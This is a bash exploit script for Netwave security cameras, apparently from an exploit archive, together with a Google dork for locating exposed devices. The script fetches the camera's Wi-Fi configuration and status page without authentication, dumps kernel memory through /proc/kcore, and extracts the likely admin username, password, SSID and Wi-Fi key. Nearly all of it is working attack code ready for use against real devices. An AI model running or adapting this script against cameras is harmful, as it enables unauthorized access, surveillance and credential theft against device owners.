#!/bin/bash ## Exploit Title: Netwave ## Google Dork: "Netwave security camera" "Live feed" ## Date: 04/02/2022 ## Exploit Author: Jeremie Amsellem ## Version: No version specified by the vendor ## Tested on: Kali Linux ## ## Written by lp1 ## ## Run this exploit on a vulnerable Netwave Camera in order ## To dump the camera's network configuration and credentials ## ## The credentials "Possible Username" and "Possible Password" ## can be used to login onto the web interface. ## ## Usage : bash netwave_exploit.sh host port ## KCORE_OUTPUT_FILE=".kcore_dump_strings" function usage() { echo "Usage : $0 host port" echo "Example : $0 81" } function print_line() { echo -e "~ [ $1 ] ~\n" } if [ "$#" -lt 1 ]; then usage exit 0 fi CAM_HOST="$1:$2" print_line "Retrieving Camera's Wi-Fi configuration from RT2870STA.dat" CAM_WIFI_CONFIGURATION=$(curl http://$CAM_HOST//etc/RT2870STA.dat 2>/dev/null) echo -e "$CAM_WIFI_CONFIGURATION \n" print_line "Retrieving global configuration from get_status.cgi" CAM_MAC=$(curl http://$CAM_HOST/get_status.cgi 2>/dev/null | grep id= | cut -d "'" -f 2) echo -e "Camera ID -" $CAM_MAC "\n" print_line "Dumping camera ROM memory... (This might take a few minutes)" curl http://$CAM_HOST//proc/kcore 2>/dev/null | strings >> $KCORE_OUTPUT_FILE MAC_LINE=$(grep -ne "^$CAM_MAC\$" $KCORE_OUTPUT_FILE | head -n 1 | cut -d ':' -f 1) MEM_LINES=$(tail -n +$MAC_LINE $KCORE_OUTPUT_FILE | head) echo "Possible Username :" $(echo $MEM_LINES | cut -d ' ' -f 2) echo "Possible Password :" $(echo $MEM_LINES | cut -d ' ' -f 3) echo "Default SSID :" $(echo $MEM_LINES | cut -d ' ' -f 4) echo "Default PSK :" $(echo $MEM_LINES | cut -d ' ' -f 5) echo -e "\n" print_line "Removing temporary memory dump" rm -frv $KCORE_OUTPUT_FILE